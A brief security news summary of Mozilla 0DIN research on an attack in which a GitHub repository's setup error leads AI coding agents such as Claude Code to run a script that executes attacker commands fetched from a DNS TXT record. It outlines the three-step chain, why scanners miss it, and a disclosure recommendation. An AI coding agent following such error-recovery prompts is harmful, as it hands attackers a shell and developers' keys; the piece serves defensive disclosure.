Researchers at Mozilla's 0DIN platform discovered a technique where seemingly benign GitHub repositories trick AI coding agents into executing malicious payloads through a three-component attack chain. The repository contains standard setup instructions that generate an error prompting the agent to run an initialization command, which calls a script retrieving configuration values from a DNS TXT record controlled by the attacker and executes them as commands. The method requires no malicious code in the cloned repository, with the agent automating the entire process while treating the actions as normal error recovery steps.
If successful, attackers gain an interactive shell with the developer's privileges, accessing environment variables, API keys, and local configuration files. Claude Code never directly opens a shell but follows three indirection steps: trusting an error message, fetching a value, and executing a DNS record it never sees. The attack remains invisible to security scanners, AI agents, and human reviewers, requiring no exploit code or suspicious commands requiring approval. Threat actors could distribute such repositories through fake job postings, tutorials, or direct messages. 0DIN recommends AI agents disclose the full execution chain of setup commands, including scripts and code fetched dynamically at runtime. The technique exploits agentic AI's trust in error messages and automated error recovery processes.
Read more...